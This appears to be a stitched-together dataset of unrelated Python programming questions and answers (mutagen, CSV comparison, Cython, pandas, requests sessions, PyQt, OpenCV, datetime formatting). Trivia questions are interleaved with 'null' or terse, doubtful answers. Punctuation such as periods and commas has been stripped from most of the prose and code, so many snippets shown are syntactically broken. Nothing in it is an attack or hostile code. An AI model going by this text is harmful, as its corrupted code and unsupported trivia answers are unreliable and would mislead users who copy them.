You can use <a href="https://bitbucket org/lazka/mutagen">mutagen</a> to get the length of the song (see the <a href="https://bitbucket org/lazka/mutagen/src/b27f57a13d47bf861bf69e95c250d12a5d7db489/docs/tutorial rst?at=default">tutorial</a>): ````from mutagen mp3 import MP3 audio = MP3("example mp3") print audio info length ````
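Tying that back to the shuffle loop in the question, a blocking sketch would be the following; the path is a placeholder and os.startfile is Windows-only, as in the question.

````
import os
import time
from mutagen.mp3 import MP3

song = 'C:\\Music\\example.mp3'     # placeholder path
length = MP3(song).info.length      # duration in seconds (a float)
os.startfile(song)                  # start playback with the default player
time.sleep(length)                  # wait until the song should be over before the next one
````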
Comparing two csv files and getting difference I have two csv file I need to compare and then spit out the differnces: CSV FORMAT: ```` Name Produce Number Adam Apple 5 Tom Orange 4 Adam Orange 11 ```` I need to compare the two csv files and then tell me if there is a difference between Adams apples on sheet and sheet 2 and do that for all names and produce numbers Both CSV files will be formated the same Any pointers will be greatly appreciated
One of the best utilities for comparing two text files is <a href="http://docs python org/library/difflib html" rel="nofollow">`difflib`</a> See a Python implementation here: <a href="http://stackoverflow com/questions/977491/comparing-2-txt-files-using-difflib-in-python">Comparing 2 txt files using difflib in Python</a> Since your rows are keyed by Name and Produce rather than by line position a key-based comparison may suit better; a sketch follows below
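A sketch of that key-based approach; the filenames are hypothetical, and it assumes the header row Name,Produce,Number shown in the question and comma-separated files — adjust the delimiter if yours differ.

````
import csv

def load(path):
    with open(path) as f:
        return {(row['Name'], row['Produce']): row['Number']
                for row in csv.DictReader(f)}

old, new = load('sheet1.csv'), load('sheet2.csv')

for key in sorted(set(old) | set(new)):
    if old.get(key) != new.get(key):
        print('%s changed from %s to %s' % (key, old.get(key), new.get(key)))
````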
How to return new C++ objects in Cython? I suspect there is an easy answer to this but I need some help getting started with Cython I have an existing C++ code base which I want to expose to Python via Cython For each class I want to expose I create a Cython cppclass `_ClassName` and the Python wrapper class `ClassName` A minmal example: ````Object h CythonMinimal pyx setup py ```` content of `Object h`: ````class Object { public: Object clone() { Object o; return o; } }; ```` content of `CythonMinimal pyx`: ````cdef extern from "Object h": cdef cppclass _Object "Object": _Object() except _Object clone() cdef class Object: cdef _Object *thisptr def __cinit__(self): self thisptr = new _Object() def __dealloc__(self): del self thisptr def clone(self): return self thisptr clone() ```` content of `setup py` ````from distutils core import setup from distutils extension import Extension from Cython Build import cythonize from Cython Distutils import build_ext import os os environ["CC"] = "g++-4 7" os environ["CXX"] = "g++-4 7" modules = [Extension("CythonMinimal" ["CythonMinimal pyx"] language = "c++" extra_compile_args=["-std=c++11"] extra_link_args=["-std=c++11"])] for e in modules: e cython_directives = {"embedsignature" : True} setup(name="CythonMinimal" cmdclass={"build_ext": build_ext} ext_modules=modules) ```` This is the error I get when compiling: ````cls ~/workspace/CythonMinimal $ python3 setup py build running build running build_ext cythoning CythonMinimal pyx to CythonMinimal cpp Error compiling Cython file: ------------------------------------------------------------ def __dealloc__(self): del self thisptr def clone(self): return self thisptr clone() ^ ------------------------------------------------------------ CythonMinimal pyx:18:27: Cannot convert '_Object' to Python object building 'CythonMinimal' extension creating build creating build/temp macosx-10 8-x86_64-3 3 g++-4 7 -Wno-unused-result -fno-common -dynamic -DNDEBUG -g -O3 -Wall -Wstrict-prototypes -I/usr/local/include -I/usr/local/opt/sqlite/include -I/usr/local/Cellar/python3/3 3 0/Frameworks/Python framework/Versions/3 3/include/python3 3m -c CythonMinimal cpp -o build/temp macosx-10 8-x86_64-3 3/CythonMinimal o -std=c++11 cc1plus: warning: command line option '-Wstrict-prototypes' is valid for C/ObjC but not for C++ [enabled by default] CythonMinimal cpp:1:2: error: #error Do not use this file it is the result of a failed Cython compilation error: command 'g++-4 7' failed with exit status 1 ```` I assume that `_Object clone` needs to return a `_Object` (cppclass type) but `Objet clone` should return a `Object` (Python type) But how?
You are returning a C++ object in a python function that is allowed to return python objects only: ````def clone(self): return self thisptr clone() ```` Make it this: ````cdef _Object clone(self) except *: return self thisptr clone() ```` But it depends on what you are trying to do you probably want to return Object and not _Object so I would modify it this way: ````cdef class Object: cdef _Object thisobj cdef _Object *thisptr def __cinit__(self Object obj=None): if obj: self thisobj = obj thisobj clone() self thisptr = &amp;self thisobj def __dealloc__(self): pass def clone(self): return Object(self) ````
In what month was Lincoln released?
null
time series data indexing using pandas or numpy The below is my OHLC 1 minute data ````2011-11-01 9:00:00 248 50 248 95 248 20 248 70 2011-11-01 9:01:00 248 70 249 00 248 65 248 85 2011-11-01 9:02:00 248 90 249 25 248 70 249 15 2011-11-01 15:03:00 250 25 250 30 250 05 250 15 2011-11-01 15:04:00 250 15 250 60 250 10 250 60 2011-11-01 15:15:00 250 55 250 55 250 55 250 55 2011-11-02 9:00:00 245 55 246 25 245 40 245 80 2011-11-02 9:01:00 245 85 246 40 245 75 246 35 2011-11-02 9:02:00 246 30 246 45 245 75 245 80 2011-11-02 9:03:00 245 75 245 85 245 30 245 35 ```` I loaded data and here is data: ```` 2 3 4 5 0_1 2011-11-01 09:00:00 248 50 248 95 248 20 248 70 2011-11-01 09:01:00 248 70 249 00 248 65 248 85 2011-11-01 09:02:00 248 90 249 25 248 70 249 15 2011-11-01 09:03:00 249 20 249 60 249 10 249 60 2011-11-01 09:04:00 249 55 249 95 249 50 249 60 ```` I would like to add 4 columns like the following in order to use groupby: ```` 2 3 4 5 year month day time 0_1 2011-11-01 09:00:00 248 50 248 95 248 20 248 70 0 0 0 0 2011-11-01 09:01:00 248 70 249 00 248 65 248 85 0 0 0 1 2011-11-01 09:02:00 248 90 249 25 248 70 249 15 0 0 0 2 2011-11-01 09:03:00 249 20 249 60 249 10 249 60 0 0 0 3 2011-11-01 09:04:00 249 55 249 95 249 50 249 60 0 0 0 4 2011-11-02 09:00:00 248 50 248 95 248 20 248 70 0 0 1 0 2011-11-02 09:01:00 248 70 249 00 248 65 248 85 0 0 1 1 2011-11-02 09:02:00 248 90 249 25 248 70 249 15 0 0 1 2 2011-11-02 09:03:00 249 20 249 60 249 10 249 60 0 0 1 3 2011-11-02 09:04:00 249 55 249 95 249 50 249 60 0 0 1 4 ```` How can I add such kind of index columns ? Thank you in advance
You can do it using the `relativedelta` function from the `dateutil` library ````from dateutil relativedelta import relativedelta start = df index[0] def func(item): delta = relativedelta(item start) return (delta years delta months delta days) &gt;&gt;&gt;&gt; pd DataFrame(list(df index map(func)) index=df index columns=['year' 'month' 'day']) year month day 0_1 2011-11-01 09:00:00 0 0 0 2011-11-01 09:01:00 0 0 0 2011-11-01 09:02:00 0 0 0 2011-11-01 15:03:00 0 0 0 2011-11-01 15:04:00 0 0 0 2011-11-01 15:15:00 0 0 0 2011-11-02 09:00:00 0 0 1 2011-11-02 09:01:00 0 0 1 2011-11-02 09:02:00 0 0 1 2011-11-02 09:03:00 0 0 1 ```` After this you can merge this with your DataFrame on index I do not know what the `time` column represents though? The minutes?
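Once those columns are attached you can run the groupby mentioned in the question — a sketch that continues directly from the `df`, `pd` and `func` above rather than standing alone.

````
extra = pd.DataFrame(list(df.index.map(func)), index=df.index,
                     columns=['year', 'month', 'day'])
df = df.join(extra)

# e.g. the last price of each day (column 5 is the close in the question's data)
print(df.groupby(['year', 'month', 'day'])[5].last())
````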
Much of the medieval period was a time of what?
power struggles
Cookies JavaScript Python Browsing-but-not-really Before I think I danced around the bush because I was not clear on the ethics of prancing around someone is website with python I saw one answer on the stackoverflow that was close to what I needed but it got deleted because ticketmaster com requested for that to happen But I will put those reservations aside I want to automatically grab a bunch of prices from a grocery store website I began my project somewhat new and rusty with python I grabbed the URLfiles as a human from my browser sessions and ran a bunch of loops to extract the data I wanted (a lot of ' find') The problem was I was at the time searching ( find()) the html files which I had downloaded manually When I switched my code over to using "urlopen" I ran into a problem I did not immediately recognize This page for example shows two different things depending on what your browsing status is ````http://www hannaford com/thumbnail/Produce/Fruits/pc/28546/46815 uts?displayAll=true ```` And I suppose it ought to because in a business like this products and prices could be very sensitive to geography My idea has been to start the 'Python-ing' at this page where I already know the store I want to select: www hannaford com/custserv/store_detail jsp?viewStoreId=21026 and I have this form in particular: ````<form action="/custserv/save_user_store cmd" method="post" name="selectThisStoreForm" onsubmit="return StoreLocator change store(this false false 21026);" &gt; <input type='hidden' name='form_state' value='selectThisStoreForm'/&gt; <input name="storeId" type="hidden" value="21026"/&gt;<p class="browseStoreLink"&gt; <a href="javascript:void(0);" onclick="this form submit();" class="altLink" &gt; <input class="shopNow" type="image" src="/assets/hf/assets/images/buttons/btn_shopNow gif" border="0" alt="Shop Now"/&gt; </a&gt; </p&gt; </form&gt; ```` So I have the onsubmit sending a JS function to a page that is not meant to be seen by humans Chrome says I have always 10 cookies when I am in a session with hannaford 7 from "hannaford com" and 3 from "www hannaford com" So just flailing a little bit: ````sesh = requests Session() Params = {'selectThisStoreForm':''} url = "http://www hannaford com/custserv/save_user_store cmd" sesh post(url param=Params) urlopen(urlFRUITS cookies=sesh cookies)#?? ```` I am getting cookies out of Sessions I am not getting the number of them that Chrome says it does get I am also not able to " find" the tags I want to find in each of these pages
There is no need to use `urllib urlopen` just use `sesh get([url])` the cookies will automatically be sent You are also not sending the right parameters for the form (the field is named storeId and form fields belong in the POST body via data= not in the query string) try: ````params = { 'form_state' : 'selectThisStoreForm' 'storeId' : '21026' } sesh post('http://www hannaford com/custserv/save_user_store cmd' data=params) resp = sesh get(urlFRUITS) ```` Alternatively you could try the `requests` library and the `Session` object it automatically manages cookies e g : ````&gt;&gt;&gt; import requests &gt;&gt;&gt; s = requests Session() &gt;&gt;&gt; r = s get('http://www THEWEBSITE com/custserv/locate_store cmd') &gt;&gt;&gt; print r status_code 200 &gt;&gt;&gt; for c in s cookies: &gt;&gt;&gt; print c <Cookie JSESSIONID=<ID&gt; for www THEWEBSITE com/&gt; <Cookie PIPELINE_SESSION_ID=<ID&gt; for www THEWEBSITE com/&gt; &gt;&gt;&gt; payload = { 'form_state' : 'selectThisStoreForm' 'storeId' : '62012' } &gt;&gt;&gt; r = s post('http://www THEWEBSITE com/custserv/save_user_store cmd' data=payload) &gt;&gt;&gt; print r status_code 200 &gt;&gt;&gt; for c in s cookies: &gt;&gt;&gt; print c <Cookie JSESSIONID=<ID&gt; for www THEWEBSITE com/&gt; <Cookie PIPELINE_SESSION_ID=<ID&gt; for www THEWEBSITE com/&gt; <Cookie USER_SESSION_VALIDATE_COOKIE=false for www THEWEBSITE com/&gt; ```` Without knowing exactly what you are doing I would try the `requests Session` object
What did the Dominican Order not seek to be?
null
During what year were Jews blamed for the poor harvest?
null
python script to simulate a GET Request receive the results how can i make a script to simulate a GET Request receive the results so to send this request but to be able to receive the answer also in python bash or php etc ````GET / HTTP/1 1 User-Agent: Mozilla/5 0 (Windows; YOU; Windows NT 5 1; en-US; rv:1 7 5) Gecko/2004 1107 Firefox/1 0 Accept: text/xml application/xml application/xhtml+xml text/html;q=0 9 text/plain;q=0 8 image/png */*;q=0 5 Accept-Language: en-us en;q=0 5 Accept-Charset: ISO-8859-1 utf-8;q=0 7 *;q=0 7 Keep-Alive: 300 Connection: close ````
You can use curl in bash, passing each header with `-H`:
````
curl -H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" \
     -H "Accept-Language: en-us,en;q=0.5" \
     -H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" \
     [url]
````
Useful options:
- `--keepalive-time <seconds>`
- `-A <agent string>` as a shortcut for setting the User-Agent
- `-i` to include the response headers in the output

A Python version is sketched below.
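If you would rather do it from Python, here is a minimal sketch using the third-party `requests` package; the URL is a placeholder and the headers simply mirror the ones in the question.
````
# minimal sketch using the third-party `requests` package;
# the URL is a placeholder: swap in the host you actually want to query
import requests

url = "http://example.com/"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0",
    "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
    "Accept-Language": "en-us,en;q=0.5",
    "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
}

response = requests.get(url, headers=headers)
print(response.status_code)   # HTTP status code of the answer
print(response.headers)       # headers the server sent back
print(response.text)          # response body as text
````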
Set PyQt QLabel to display peerAddress after connected to a server I try to make simple operation in PyQt4 After a client connects to a server I want to change a text in a label to show an address of the server ````def connectToServer(self): self connectButton setEnabled(False) self socket connectToHost(HOST PORT) print(self socket peerAddress()) try: self lblSrvConnected setText(self socket peerAddress()) # changes lbl to address except: self lblSrvConnected setText('Some error') ```` The print statement gives `<PyQt4 QtNetwork QHostAddress object at 0x02C23DB0&gt;` and the label always changes to `Some error` from `expect` I tried to do conversion to string with `str()` use `peerAddress` without bracket etc When I call `peerName()` instead of `peerAddress()` it prints `localhost` but `peerPort()` gives `0` instead of the port I use I expect I have two problems First I cannot get out address and port from peerAddress I tried assign it to variables but then have an error: `TypeError: QHostAddress' object is not iterable` Second I expect I try to change the label before connection is established I tried with ` waitForConnected()` but cannot make it that way either I cannot find how to make it working
Try:
<blockquote>
<strong>QHostAddress.toString(self)</strong>

Returns the address as a string. For example, if the address is the IPv4 address 127.0.0.1, the returned string is "127.0.0.1". For IPv6 the string format will follow the RFC5952 recommendation.
</blockquote>
from the Qt4 documentation. `QLabel.setText()` expects a string, so passing the `QHostAddress` object directly raises the exception that sends you into the `except` branch. Your second problem is that `connectToHost()` is asynchronous: immediately after the call the socket is usually not connected yet, which is why `peerPort()` still returns 0. Update the label from the socket's `connected()` signal (or after `waitForConnected()` returns True), as sketched below.
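A minimal sketch of that idea, assuming `self.socket` is a `QtNetwork.QTcpSocket` and keeping the widget names (`connectButton`, `lblSrvConnected`) and the `HOST`/`PORT` constants from the question:
````
# minimal sketch; self.socket, HOST, PORT and the widget names are assumed
# to be set up exactly as in the question
def connectToServer(self):
    self.connectButton.setEnabled(False)
    # only touch the label once the connection is actually established
    self.socket.connected.connect(self.onConnected)
    self.socket.connectToHost(HOST, PORT)

def onConnected(self):
    address = self.socket.peerAddress().toString()   # e.g. "127.0.0.1"
    port = self.socket.peerPort()                    # non-zero once connected
    self.lblSrvConnected.setText('%s:%s' % (address, port))
````
If the connection attempt can fail, you would also want to connect the socket's `error()` signal to a slot that writes your 'Some error' text.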
Reading a file and storing contents into a dictionary - Python I am trying to store contents of a file into a dictionary and I want to return a value when I call its key Each line of the file has two items (acronyms and corresponding phrases) that are separated by commas and there are 585 lines I want to store the acronyms on the left of the comma to the key and the phrases on the right of the comma to the value Here is what I have: ````def read_file(filename): infile = open(filename 'r') for line in infile: line = line strip() #remove newline character at end of each line phrase = line split(' ') newDict = {'phrase[0]':'phrase[1]'} infile close() ```` And here is what I get when I try to look up the values: ````&gt;&gt;&gt; read_file('acronyms csv') &gt;&gt;&gt; acronyms=read_file('acronyms csv') &gt;&gt;&gt; acronyms['ABOUT'] Traceback (most recent call last): File "<pyshell#65&gt;" line 1 in <module&gt; acronyms['ABOUT'] TypeError: 'NoneType' object is not subscriptable &gt;&gt;&gt; ```` If I add `return newDict` to the end of the body of the function it obviously just returns `{'phrase[0]':'phrase[1]'}` when I call `read_file('acronyms csv')` I have also tried `{phrase[0]:phrase[1]}` (no single quotation marks) but that returns the same error Thanks for any help
````
def read_file(filename):
    infile = open(filename, 'r')
    newDict = {}
    for line in infile:
        line = line.strip()            # remove newline character at end of each line
        phrase = line.split(',', 1)    # split on the first comma only
        newDict[phrase[0]] = phrase[1]
    infile.close()
    return newDict
````
Your original creates a brand-new dictionary on every iteration of the loop and never returns anything, so the function returns `None`; that is exactly what the `TypeError: 'NoneType' object is not subscriptable` is telling you.
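Hypothetical usage, assuming `acronyms.csv` holds one `ACRONYM,phrase` pair per line (the file name and the sample key come from the question):
````
# hypothetical usage; the file name and the key 'ABOUT' come from the question
acronyms = read_file('acronyms.csv')
print(acronyms['ABOUT'])   # prints the phrase stored for the acronym 'ABOUT'
````
As a design note, `with open(filename) as infile:` would close the file automatically even if an exception is raised part-way through the loop.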
Convert String to Python datetime Object without Zero Padding I am using python 3 5 I have a string formatted as `mm/dd/yyyy H:MM:SS AM/PM` that I would like as a python datetime object Here is what I have tried ```` date = "09/10/2015 6:17:09 PM" date_obj = datetime datetime strptime(date '%d/%m/%Y %I:%M:%S %p') ```` But this gets an error because the hour is not zero padded The formatting was done per the table on the <a href="https://docs python org/3 5/library/datetime html#strftime-and-strptime-behavior" rel="nofollow">datetime documentation</a> which does not allow the hour to have one digit I have tried splitting the date up adding a zero and then reassembling the string back together while this works this seems less robust/ideal ```` date = "09/10/2015 6:17:09 PM" date = date split() date = date[0] " 0" date[1] " " date[2] ```` Any recommendation on how to get the `datetime` object directly or a better method for padding the hour would be helpful Thank you
There is nothing wrong with this code: ````&gt;&gt;&gt; date = "09/10/2015 6:17:09 PM" &gt;&gt;&gt; date_obj = datetime datetime strptime(date '%m/%d/%Y %I:%M:%S %p') &gt;&gt;&gt; date_obj datetime datetime(2015 9 10 18 17 9) &gt;&gt;&gt; print(date_obj) 2015-09-10 18:17:09 ```` The individual attributes of the `datetime` object are integers not strings and the internal representation uses 24hr values for the hour Note that I have swapped the day and month in the format strings as you state that the input format is `mm/dd/yyyy` But it seems that you actually want it as a string with zero padded hour so you can use `datetime strftime()` like this: ````&gt;&gt;&gt; date_str = date_obj strftime('%m/%d/%Y %I:%M:%S %p') &gt;&gt;&gt; print(date_str) 09/10/2015 06:17:09 PM # or if you actually want the output format as %d/%m/%Y &gt;&gt;&gt; print(date_obj strftime('%d/%m/%Y %I:%M:%S %p')) 10/09/2015 06:17:09 PM ````
How much does the SNES unit weigh in pounds?
null
run a file gms from python script I need to create a python script that runs a file gams (myfile gms) My file is in a folder `F:\Otim\correct` so I was using a part of a code that I saw in this forum I made: ```` import subprocess subprocess check_call(["F:\Otim\correct\myfile gms"]) ```` and I get an error: ````Runtime error Traceback (most recent call last): File "<string&gt;" line 80 in <module&gt; File "C:\Python27\ArcGIS10 2\Lib\subprocess py" line 506 in check_call retcode = call(*popenargs **kwargs) File "C:\Python27\ArcGIS10 2\Lib\subprocess py" line 493 in call return Popen(*popenargs **kwargs) wait() File "C:\Python27\ArcGIS10 2\Lib\subprocess py" line 679 in __init__errread errwrite) File "C:\Python27\ArcGIS10 2\Lib\subprocess py" line 896 in _execute_child startupinfo) WindowsError: [Error 193] %1 is not a valid Win32 application ```` Can someone help me please? Thanks
I have never used gams but after a quick look at www gams com it sounds like myfile gms is not the file to be executed but the input file to be given as argument to the gams executable So you should try something like : ````import subprocess subprocess check_call([r"C:\path\to\programs\GAMS exe" r"F:\Otim\correct\myfile gms"]) ```` Notice : there is a GAMS python API which could give you a more portable solution
Placing a graph on a 2d array I have a graph that consists of nodes and connections Each node has a list of every other node it is connected to like the object: ````class Node(): def __init__(self): self connections = [] def connect(self node): self connections append(node) node connections append(self) ```` This is a simplified version of my node class These nodes are connected in a tree-like structure - no loop connections How would I go about turning a graph like a-b   /f /h  \c-d-e-g into a 2d array like ````[[a b f h] [c d e g]] ```` The array does not have a size limit but the array produced should be somewhat condensed Extra nodes can be created to be used as filler if it is required This is the opposite of what questions that ask for a maze to be converted into a graph are asking for
- Work out a preference order for the four directions (N, E, S, W).
- For any node with more than 4 connections:
  - Add a new placeholder 'connection' node.
  - While the overflowing node still has more than 4 connections:
    - If a connection has not been placed yet and is not the node just created, disconnect it from the overflowing node and connect it to the new node instead.
- Place the start node at (0, 0).
- Set the current node to the one placed last.
- For each connecting node:
  - If the preferred direction is empty, place the node in that cell and carry on from it.
  - Otherwise try the remaining directions in preference order.
  - If all four neighbouring cells are full, undo the placements and report failure (backtrack).

A rough sketch of the placement loop is given after this list.
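A rough sketch of the placement step only, under these assumptions: the `Node` class from the question, every node already has at most 4 connections (the overflow handling above is omitted), and the grid is a dict mapping `(x, y)` to a node. `DIRECTIONS`, `place` and the snapshot-based backtracking are my own choices, not a fixed algorithm.
````
# rough sketch: place a tree of Node objects on an unbounded grid, trying
# N, E, S, W in that order and backtracking when a node cannot be placed
DIRECTIONS = [(0, -1), (1, 0), (0, 1), (-1, 0)]   # N, E, S, W

def place(node, pos, grid, done):
    """Try to place `node` at `pos`; returns True on success.
    On failure, `grid` and `done` are restored to their previous state."""
    snapshot_grid, snapshot_done = dict(grid), set(done)   # simple but O(n) backtracking
    grid[pos] = node
    done.add(node)
    for neighbour in node.connections:
        if neighbour in done:
            continue
        for dx, dy in DIRECTIONS:
            cell = (pos[0] + dx, pos[1] + dy)
            if cell not in grid and place(neighbour, cell, grid, done):
                break
        else:
            # no free direction worked for this neighbour: roll everything back
            grid.clear()
            grid.update(snapshot_grid)
            done.clear()
            done.update(snapshot_done)
            return False
    return True
````
Once placement succeeds (for example `grid = {}; done = set(); place(start_node, (0, 0), grid, done)`), shift the minimum x and y found in the grid keys to zero and copy the nodes into a plain 2d list.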
What is the percentage of non-repetitive DNA in E. coli?
null
Using SimpleHTTPServer to interpret failed requests and dynamically create JSON pages? I have a python program that takes and validates user input <strong><them>(flightNumber dateStamp)</them></strong> and performs three api lookups: ````1 get flight info 2: find flightId 3: track flightID and return up to date JSON ```` I should now like to make this information available to the web at ````mysite com/flightNumber/dateStamp ```` to any user passing a <strong><them>'Valid'</them></strong> flightNumber and dateTime Is it possible to: Setup a SimpleHTTPServer at mysite com and log all paths attempted When a connection is made to any path it will fail as there is nothing there (unless/until I cache) But I simply send a user a hold message use are' Python script to check if the url is <strong><them>'Valid'</them></strong> (flightNumber dateStamp) If not <strong><them>'Valid'</them></strong> I return an error If <strong><them>'Valid'</them></strong> I parse the relevant url info into parts of my existing program The results I get back from my existing api calls create a JSON readable page at ```` /flightNumber/dateStamp ```` Now I forward the user to the page Is this possible? it seems an interesting way to achieve what I am after
Yes, this is all possible and reasonably simple, although it is hard to be more specific given the level of detail provided. The rough flow is: accept any request path, parse it as `/flightNumber/dateStamp`, validate the two parts, run your existing lookups, and return the resulting JSON (or an error) to the client. A minimal sketch is below.
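A minimal sketch of that flow, assuming Python 3 and using `http.server` rather than `SimpleHTTPServer` (which only serves files from disk); `is_valid()` and `lookup_flight()` are hypothetical stand-ins for the validation and API-lookup code you already have.
````
# minimal sketch; is_valid() and lookup_flight() are hypothetical stand-ins
# for your existing validation and API-lookup code
import json
from http.server import BaseHTTPRequestHandler, HTTPServer

def is_valid(flight_number, date_stamp):
    return bool(flight_number) and bool(date_stamp)        # replace with real checks

def lookup_flight(flight_number, date_stamp):
    return {'flight': flight_number, 'date': date_stamp}   # replace with real lookups

class FlightHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        parts = self.path.strip('/').split('/')
        if len(parts) == 2 and is_valid(*parts):
            status, payload = 200, lookup_flight(*parts)
        else:
            status, payload = 404, {'error': 'invalid flight number or date'}
        body = json.dumps(payload).encode('utf-8')
        self.send_response(status)
        self.send_header('Content-Type', 'application/json')
        self.end_headers()
        self.wfile.write(body)

if __name__ == '__main__':
    HTTPServer(('', 8000), FlightHandler).serve_forever()
````
For anything beyond a toy, a small framework such as Flask or Bottle makes the routing and caching far less fiddly than a raw `BaseHTTPRequestHandler`.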
As technology increased what was the amount of bombs that could be dropped in 1937 per day?
644
Python referring to an item in a list from another list I have a list of variables (listA) from from another list (listB) The problem I am having is that the items from listB are being passed by value to listA rather than by reference Is there anyway I can access the the object in listB after having put its value in listA? For example: ````listB = [1 2 3 4 5] listA = [listB[0] listB[1]] listA[0] = 0 ```` this makes listA equal to [0 2] and leaves listB unchanged I would like to modify listB so that it becomes [0 2 3 4 5] I have of course come up with a solution to this but its ugly and I was wondering if there was an elegant way of doing this
Everything in Python is a reference. After all those statements are executed, `listB[1]` and `listA[1]` are <em>literally</em> the same object (you can check by comparing `id(listB[1])` and `id(listA[1])`). The reason `listA[0]` and `listB[0]` are different is merely that you put a different reference into that spot; rebinding `listA[0]` never touches `listB`.

Judging from your description, you do not want a `listA` that stores references to the objects in `listB`. What you want is a `listA` that is a <em>view</em> of `listB`. I believe you have only two options:

- Create a special sequence that internally stores a reference to `listB` and whose `__getitem__` and `__setitem__` methods perform lookups into `listB` when invoked.
- Create a special reference type that contains something like a "sequence and index", and put these references into `listA`. But to modify `listB` through `listA` you will have to invoke some sort of "get" and "set" methods on these reference objects.

A sketch of the first option is shown below.
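A minimal sketch of the first option; `ListView` and its attribute names are my own, not anything from the standard library, and only indexing, assignment and `len()` are implemented.
````
# minimal sketch of a "view" onto another list; only __getitem__, __setitem__
# and __len__ are implemented
class ListView(object):
    def __init__(self, backing, indices):
        self.backing = backing      # the real list (e.g. listB)
        self.indices = indices      # which positions of `backing` this view exposes

    def __getitem__(self, i):
        return self.backing[self.indices[i]]

    def __setitem__(self, i, value):
        self.backing[self.indices[i]] = value

    def __len__(self):
        return len(self.indices)

listB = [1, 2, 3, 4, 5]
listA = ListView(listB, [0, 1])
listA[0] = 0
print(listB)   # [0, 2, 3, 4, 5]
````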
auto detect face and take a snapshot with opencv i am working on face recognition project with my college what i am trying to take a snapshot and save it if the face is detected automatically before closing the webcam what I have now is open cam and wait if face is detected and press "q" to take snapshot and save the image Here is the code: ````import numpy as np import cv2 import time #import the cascade for face detection face_cascade = cv2 CascadeClassifier('haarcascade_frontalface_default xml') def TakeSnapshotAndSave(): # access the webcam (every webcam has a number the default is 0) cap = cv2 VideoCapture(0) while(True): # Capture frame-by-frame ret frame = cap read() # to detect faces in video gray = cv2 cvtColor(frame cv2 COLOR_BGR2GRAY) faces = face_cascade detectMultiScale(gray 1 3 5) for (x y w h) in faces: cv2 rectangle(frame (x y) (x+w y+h) (255 0 0) 2) roi_gray = gray[y:y+h x:x+w] roi_color = frame[y:y+h x:x+w] x = 0 y = 20 text_color = (0 255 0) # write on the live stream video cv2 putText(frame "Press q when ready" (x y) cv2 FONT_HERSHEY_PLAIN 1 0 text_color thickness=2) # if you want to convert it to gray uncomment and display gray not fame #gray = cv2 cvtColor(frame cv2 COLOR_BGR2GRAY) # Display the resulting frame cv2 imshow('frame' frame) # press the letter "q" to save the picture if cv2 waitKey(1) &amp; 0xFF == ord('q'): # write the captured image with this name cv2 imwrite('try jpg' frame) break # When everything done release the capture cap release() cv2 destroyAllWindows() if __name__ == "__main__": TakeSnapshotAndSave() ```` thank you in advance
Perform `imwrite()` inside the `for (x, y, w, h) in faces:` loop itself. If you use a constant filename, only the last detected face will be saved and the rest will be overwritten, so build a unique filename per face (see the sketch below).
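A minimal sketch of that change, keeping the setup and variable names from the question; the counter and the `face_%d.jpg` filename pattern are my own choices.
````
# minimal sketch; the cascade file and camera index are the ones from the
# question, the counter and filename pattern are my own choices
import cv2

face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
cap = cv2.VideoCapture(0)
count = 0

while True:
    ret, frame = cap.read()
    if not ret:
        break
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    faces = face_cascade.detectMultiScale(gray, 1.3, 5)
    for (x, y, w, h) in faces:
        cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)
        # save every detected face region under its own filename,
        # without waiting for a key press
        cv2.imwrite('face_%d.jpg' % count, frame[y:y + h, x:x + w])
        count += 1
    cv2.imshow('frame', frame)
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break

cap.release()
cv2.destroyAllWindows()
````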
How to install PIL (or any module really) to the raspberry pi? I want to install PIL and python-numpy at the least I want to turn an image into an array but really cannot seem to find info on installing/using modules to raspberry pi Could somebody just explain?
Assuming that you are using the Raspberry Pi Foundation's recommended Raspbian image those packages are available through the package manager For numpy you want to run this as root using sudo if appropriate: ````apt-get install python-numpy ```` Installing PIL is similar; just find the package name for PIL and apt-get it I do not know it myself but using "apt-cache search " and grep will find it for you fairly quickly
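For the PIL half, the package is typically `python-imaging` on older Raspbian images (or `python-pil` for Pillow on newer ones); `apt-cache search pil` will confirm which name your image uses, so treat those names as something to verify. Once PIL and numpy are installed, turning an image into an array looks like this (the filename is a placeholder):
````
# small example of going from an image file to a numpy array;
# 'image.jpg' is a placeholder filename
import numpy as np
from PIL import Image

img = Image.open('image.jpg')
arr = np.asarray(img)          # shape is (height, width, channels) for an RGB image
print(arr.shape, arr.dtype)
````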
python syntax datetime Why is the date output formats different between these two codes? One is the datetime object the other one seems to be a string (I prefer the string look alike format) What am I missing? ````def generator(): i=0 while (i<50000): yield random randint(-1 1) datetime datetime now() i=i+1 mynumber = 100 for random_number current_time in generator(): mynumber = random_number print mynumber " " current_time ```` Output: ````&gt;&gt;&gt; 100 2013-04-04 09:16:55 730000 101 2013-04-04 09:16:55 746000 ```` Second example: ````def test(timestamp interval = 1*60): xt = datetime datetime(2013 4 4) #dt = datetime datetime strptime(timestamp '%d/%m/%Y %H:%M:%S') dt=timestamp delta_second =(dt - xt) seconds normalize_second = (delta_second / interval) * interval newtime = xt timedelta(seconds=normalize_second) print (dt newtime) test(datetime datetime now()) ```` ``` >>> (datetime datetime(2013 4 4 9 21 12 386000) datetime datetime(2013 4 4 9 21)) ```
You are printing <them>different things</them> In the first example you print the datetime <them>directly</them> so `print` converts it to `str()` In the second example you print a <them>tuple</them> and tuples always are printed with the contents as `repr()` instead: ````&gt;&gt;&gt; now = datetime datetime now() &gt;&gt;&gt; print now 2013-04-04 10:28:10 029566 &gt;&gt;&gt; print (now ) # tuple (datetime datetime(2013 4 4 10 28 10 29566) ) &gt;&gt;&gt; print repr(now) datetime datetime(2013 4 4 10 28 10 29566) ```` In both cases you are still printing a `datetime` object
